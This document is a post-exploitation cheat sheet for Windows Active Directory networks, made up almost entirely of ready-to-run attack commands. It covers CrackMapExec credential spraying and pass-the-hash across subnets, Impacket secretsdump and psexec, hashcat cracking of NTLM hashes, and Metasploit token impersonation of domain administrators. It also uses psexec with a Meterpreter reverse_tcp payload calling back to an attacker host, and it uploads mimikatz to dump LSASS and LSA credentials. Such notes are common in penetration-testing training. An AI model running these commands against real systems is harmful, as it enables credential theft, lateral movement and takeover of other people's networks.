Post Exploitation
Post-exploitation refers to any actions taken after a session is opened. A session is an open shell obtained from a successful exploit or brute-force attack. The shell can be a standard command shell or a Meterpreter session.
// post exploitation: collect Active Directory data with the SharpHound PowerShell collector
Invoke-Bloodhound -CollectionMethod All -Domain TestDomain.local -ZipFileName results.zip
Post exploitation with CrackMapExec, Metasploit and Impacket
// install CrackMapExec (Kali)
apt install crackmapexec
// check a domain credential against every SMB host in the subnet
crackmapexec smb 10.0.0.0/24 -u username -d DOMAIN -p Password
// Metasploit: authenticate over SMB, then dump local hashes from the resulting session
use exploit/windows/smb/psexec
hashdump
// reuse an NT hash for a local account across the subnet (--local-auth = local account, not domain)
crackmapexec smb 10.0.0.0/24 -u username -H 123abdehhf012445 --local-auth
// Impacket: remote shell and credential dump with a domain account
psexec.py domain/username:Password@10.0.0.1
secretsdump.py domain/username:Password@ip
// crack dumped NTLM hashes (-m 1000 = NTLM) with the rockyou wordlist
hashcat64.exe -m 1000 hashes4.txt rockyou.txt -O
Pass the Hash
// CrackMapExec: authenticate with the NT hash of the local administrator account across the subnet
crackmapexec smb ip/24 -u "administrator" -H hash --local-auth
// Impacket: same with psexec.py, hashes given as LMHASH:NTHASH
psexec.py username@192.168.1.1 -hashes LMHASH:NTHASH
Token Impersonation
Delegate tokens - created for interactive logons, e.g. logging into a machine at the console or over RDP
Impersonate tokens - created for "non-interactive" sessions such as attaching a network drive or running a domain logon script
https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
Metasploit (inside a Meterpreter session)
load incognito
meterpreter > list_tokens -u
impersonate_token domain\\username
shell
Domain Admin impersonation
impersonate_token DOMAIN\\administrator
shell
whoami
// Invoke-Mimikatz (PowerShell) against a remote computer: dump LSA secrets
Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /patch" exit' -Computer Computer.Domain.local
// the same with a concrete host name
Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /patch" exit' -Computer hydra.domain.local
// migrate to PID 1000 (a 64-bit process such as winlogon) when the session runs in a 32-bit process but 64-bit is required
migrate 1000
// BloodHound setup on the attacking machine
apt-get install bloodhound
neo4j console &
// neo4j web console
http://localhost:7474
// from the Meterpreter session: run the SharpHound collector and retrieve its output
upload sharphound.exe
execute -f sharphound.exe
download SOMETHING.zip
// start the BloodHound GUI and import the zip
bloodhound
// background the current Meterpreter session (answer y to "Background session? [y/N]") and list sessions
background
sessions -l
// scan the subnet for SMB (TCP 445)
use auxiliary/scanner/portscan/tcp
set PORTS 445
set RHOSTS <target range>
set THREADS 20
run
// psexec with the recovered credential or hash to obtain a Meterpreter session
use exploit/windows/smb/psexec
set RHOSTS <target>
set SMBUser Administrator
set SMBPass <hash>
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker ip>
set LPORT 4445
run
getuid
// upload mimikatz into the session and dump logon credentials from LSASS
upload /usr/share/mimikatz/x64/mimikatz.exe
shell
mimikatz
privilege::debug
sekurlsa::logonPasswords full